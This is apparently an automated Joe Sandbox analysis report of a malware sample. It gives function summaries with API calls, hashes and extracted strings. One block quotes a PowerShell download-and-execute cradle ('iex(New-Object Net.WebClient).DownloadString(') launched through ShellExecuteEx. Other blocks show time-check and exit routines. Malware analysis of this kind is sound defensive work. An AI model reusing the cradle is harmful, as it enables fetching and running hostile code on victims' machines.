                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: zn@$zn@
                                                                                                • API String ID: 1029625771-1156428846
                                                                                                • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                                                                                • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                                                                                • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                                                                                • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                                                                                Strings
                                                                                                • <, xrefs: 00412F89
                                                                                                • ')", xrefs: 00412F03
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                                                                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                • API String ID: 3031569214-898575020
                                                                                                • Opcode ID: b1d6d6e6ddb63405df561fc4134c7f7c536001f1b95d11fefc732fe9707bbb46
                                                                                                • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                                                                                • Opcode Fuzzy Hash: b1d6d6e6ddb63405df561fc4134c7f7c536001f1b95d11fefc732fe9707bbb46
                                                                                                • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                                                                                APIs
                                                                                                • strtok_s.MSVCRT ref: 00410FE8
                                                                                                • strtok_s.MSVCRT ref: 0041112D
                                                                                                  • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                  • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: strtok_s$lstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 348468850-0
                                                                                                • Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                                                                                • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                                                                                • Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                                                                                • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0
                                                                                                • Opcode ID: 496d0295ac2335c7c1224ef69ce366e867a485541ce5617034c0dd301fdb04fa
                                                                                                • Instruction ID: e09c7450f533b02a9d9c6c768b2f90bf660d5ad5b14910876479b4836033676b
                                                                                                • Opcode Fuzzy Hash: 496d0295ac2335c7c1224ef69ce366e867a485541ce5617034c0dd301fdb04fa
                                                                                                • Instruction Fuzzy Hash: FC218372D01699EADB115F55CC40EAF3A79EB81798F118115F83867B74CBB09D038BE0
                                                                                                APIs
                                                                                                • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,0096C238,?,004210F4,?,00000000,?), ref: 00416C0C
                                                                                                • sscanf.NTDLL ref: 00416C39
                                                                                                • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,0096C238,?,004210F4), ref: 00416C52
                                                                                                • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0096C238,?,004210F4), ref: 00416C60
                                                                                                • ExitProcess.KERNEL32 ref: 00416C7A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Time$System$File$ExitProcesssscanf
                                                                                                • String ID:
                                                                                                • API String ID: 2533653975-0
                                                                                                • Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                                                                                • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                                                                                • Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                                                                                • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                                                                                APIs
                                                                                                • StrStrA.SHLWAPI(00974110,00000000,00000000,?,00409F71,00000000,00974110,00000000), ref: 004193FC
                                                                                                • lstrcpyn.KERNEL32(006D7580,00974110,00974110,?,00409F71,00000000,00974110), ref: 00419420
                                                                                                • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,00974110), ref: 00419437
                                                                                                • wsprintfA.USER32 ref: 00419457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpynlstrlenwsprintf
                                                                                                • String ID: %s%s
                                                                                                • API String ID: 1206339513-3252725368
                                                                                                • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                                                                                • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                                                                                • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                                                                                • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0041CA7E
                                                                                                  • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                                                                  • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                                                                                • __getptd.LIBCMT ref: 0041CA95
                                                                                                • __amsg_exit.LIBCMT ref: 0041CAA3
                                                                                                • __lock.LIBCMT ref: 0041CAB3
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
                                                                                                • Instruction ID: 3f7fe6514f949f75c5091ac4188df1b21daf88bb75e36ed85571065e92ff899f
                                                                                                • Opcode Fuzzy Hash: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
                                                                                                • Instruction Fuzzy Hash: 10F06231A842189BD622FBA95C867DE33A0AF00758F50014FE405562D2CB7C59C186DE
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                                                                                • ExitProcess.KERNEL32 ref: 004169F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                • String ID: <
                                                                                                • API String ID: 1148417306-4251816714
                                                                                                • Opcode ID: f8448182c22cce2378c378dd1cd2a8c25681252e273e45d8bc4dcec85645523b
                                                                                                • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                                                                                • Opcode Fuzzy Hash: f8448182c22cce2378c378dd1cd2a8c25681252e273e45d8bc4dcec85645523b
                                                                                                • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                • API String ID: 1646373207-328863460
                                                                                                • Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
                                                                                                • Instruction ID: ecefe885db533eab1004145bf0edfd2de441c317d2227bbbfd891c436449bb9f
                                                                                                • Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
                                                                                                • Instruction Fuzzy Hash: CBE06DB4914B029BEB017FF4850633EBAF5AFC570AF72C42CD4808A290EA30C4818763
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                                                                • wsprintfW.USER32 ref: 00418F08
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                                • String ID: %hs
                                                                                                • API String ID: 659108358-2783943728
                                                                                                • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                                                                                • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                                                                                • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                                                                                • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: 0
                                                                                                • API String ID: 1475443563-4108050209
                                                                                                • Opcode ID: 7fdc829c56b0d73d757a58cb71872ab273c961bf249caa9fc6ea8f3c5a1c35e8
                                                                                                • Instruction ID: 3f20ce3ba2961136da7f3248cde08971803f4c449cb9daae0617fd169a942f67
                                                                                                • Opcode Fuzzy Hash: 7fdc829c56b0d73d757a58cb71872ab273c961bf249caa9fc6ea8f3c5a1c35e8
                                                                                                • Instruction Fuzzy Hash: 6CE112B0E04269CBDB41CFA8C99078DBBF1BF89318F258569D859AB345D734E886CF41
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
